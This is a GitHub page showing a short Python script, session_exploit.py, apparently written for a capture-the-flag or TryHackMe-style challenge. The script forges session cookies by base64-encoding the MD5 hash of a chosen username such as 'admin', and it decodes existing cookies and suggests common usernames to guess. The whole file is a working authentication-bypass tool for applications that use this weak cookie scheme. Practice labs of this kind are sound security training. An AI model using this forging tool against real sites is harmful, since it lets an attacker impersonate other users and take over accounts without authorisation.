-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathsession_exploit.py
More file actions
101 lines (76 loc) · 2.73 KB
/
Copy pathsession_exploit.py
File metadata and controls
101 lines (76 loc) · 2.73 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
#!/usr/bin/env python3
import argparse
import base64
import hashlib
import sys
import urllib.parse
BANNER = r"""
_____ _
/ ____| (_)
| (___ ___ ___ ___ _ ___ _ __
\___ \ / _ \/ __/ __| |/ _ \| '_ \
____) | __/\__ \__ \ | (_) | | | |
|_____/ \___||___/___/_|\___/|_| |_|
Session Cookie Utility
"""
AUTHOR_BLOCK = """
[ Author ]
Name : MrDestroyer
Instagram : zimthegoat
Facebook : zimthegoat
TryHackMe : p/MohammadZim
GitHub : MrDestroyer
"""
def print_banner() -> None:
print(BANNER)
print(AUTHOR_BLOCK.strip())
print()
def encode_username(username: str) -> str:
"""Encode a username into the expected session cookie format."""
md5_hash = hashlib.md5(username.encode()).hexdigest()
base64_encoded = base64.b64encode(md5_hash.encode()).decode()
return urllib.parse.quote(base64_encoded)
def decode_session(cookie_value: str) -> str:
"""Extract the MD5 hash stored inside a session cookie value."""
try:
if cookie_value.startswith("session="):
cookie_value = cookie_value[8:]
decoded = urllib.parse.unquote(cookie_value)
return base64.b64decode(decoded).decode()
except Exception as exc:
raise ValueError(f"failed to decode cookie: {exc}") from exc
def build_parser() -> argparse.ArgumentParser:
parser = argparse.ArgumentParser(
prog="session_exploit.py",
description="Encode or decode MD5-based session cookies.",
)
subparsers = parser.add_subparsers(dest="mode", required=True)
encode_parser = subparsers.add_parser("encode", help="Generate a session cookie")
encode_parser.add_argument("username", help="Username to encode")
decode_parser = subparsers.add_parser("decode", help="Extract the hash from a cookie")
decode_parser.add_argument("cookie", help="Cookie value or full session=<value> string")
return parser
def main() -> int:
print_banner()
parser = build_parser()
args = parser.parse_args()
if args.mode == "encode":
cookie = encode_username(args.username)
print("[+] Username :", args.username)
print("[+] Session Cookie :", f"session={cookie}")
return 0
if args.mode == "decode":
try:
hash_value = decode_session(args.cookie)
except ValueError as exc:
print(f"[-] {exc}", file=sys.stderr)
return 1
print("[+] Extracted MD5 :", hash_value)
print()
print("[i] Username recovery requires checking candidate usernames")
print("[i] Common guesses: admin, root, test, user, guest")
return 0
parser.print_help()
return 1
if __name__ == "__main__":
raise SystemExit(main())